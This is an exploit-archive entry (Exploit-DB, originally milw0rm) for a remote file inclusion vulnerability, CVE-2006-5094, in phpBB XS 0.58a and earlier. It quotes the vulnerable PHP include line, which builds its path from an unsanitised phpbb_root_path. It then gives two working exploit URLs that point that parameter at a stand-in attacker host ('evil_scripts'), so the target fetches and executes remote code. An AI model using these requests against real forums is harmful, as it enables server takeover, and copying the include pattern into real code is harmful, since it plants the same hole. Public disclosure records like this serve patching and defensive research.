phpBB XS <= 0.58a phpbb_root_path Remote File Include Vulnerability

2006-09-28T00:00:00
ID EDB-ID:2453
Type exploitdb
Reporter Mehmet Ince
Modified 2006-09-28T00:00:00

Description

phpBB XS <= 0.58a (phpbb_root_path) Remote File Include Vulnerability. CVE-2006-5094. Webapps exploit for php platform

                                        
                                            ###########################################################

#phpBB XS &lt;= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)

############################################################

#Author: XORON - SHiKaA

############################################################

#URL: http://www.comscripts.com/jump.php?action=script&id=1082

############################################################

#Class: Remote

############################################################

#Code:   include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx);

############################################################

#Exploit:

http://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://evil_scripts?
http://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://evil_scripts?

############################################################

#Greetz: str0ke and AzzCoder ;)

############################################################

# milw0rm.com [2006-09-28]